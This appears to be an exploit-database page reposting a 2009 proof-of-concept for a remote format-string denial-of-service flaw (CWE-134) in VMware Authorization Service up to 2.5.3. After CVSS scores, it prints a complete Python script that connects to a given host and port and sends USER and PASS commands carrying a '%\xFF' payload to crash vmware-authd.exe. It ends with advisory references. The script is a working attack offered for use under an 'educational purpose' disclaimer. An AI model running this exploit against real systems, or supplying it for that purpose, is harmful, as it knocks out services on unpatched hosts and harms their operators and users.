VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS

2009.10.16
Credit: shinnai
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-134


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

# ---------------------------------------------------------------------------- # VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS # url: http://www.vmware.com/ # # author: shinnai # mail: shinnai[at]autistici[dot]org # site: http://www.shinnai.net # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # # Tested on Windows XP Professional Ita SP3 full patched # ---------------------------------------------------------------------------- # usage: C:\>exploit.py 127.0.0.1 912 import socket import time import sys host = str(sys.argv[1]) port = int(sys.argv[2]) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: conn = s.connect((host, port)) d = s.recv(1024) print "Server <- " + d s.send('USER \x25\xFF \r\n') print 'Sending command "USER" + evil string...' d = s.recv(1024) print "Server response <- " + d s.send('PASS \x25\xFF \r\n') print 'Sending command "PASS" + evil string...' try: d = s.recv(1024) print "Server response <- " + d except: print "\nExploit completed..." except: print "Something goes wrong honey..."

References:

http://www.shinnai.net/xplits/TXT_JtYUv6C6j5b6Bw6iIkF4.html
http://www.shinnai.net/index.php?mod=02_Forum&group=02_Bugs_and_Exploits&argument=01_Remote&topic=1254924405.ff.php
http://securitytracker.com/id?1022997
http://secunia.com/advisories/36988


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top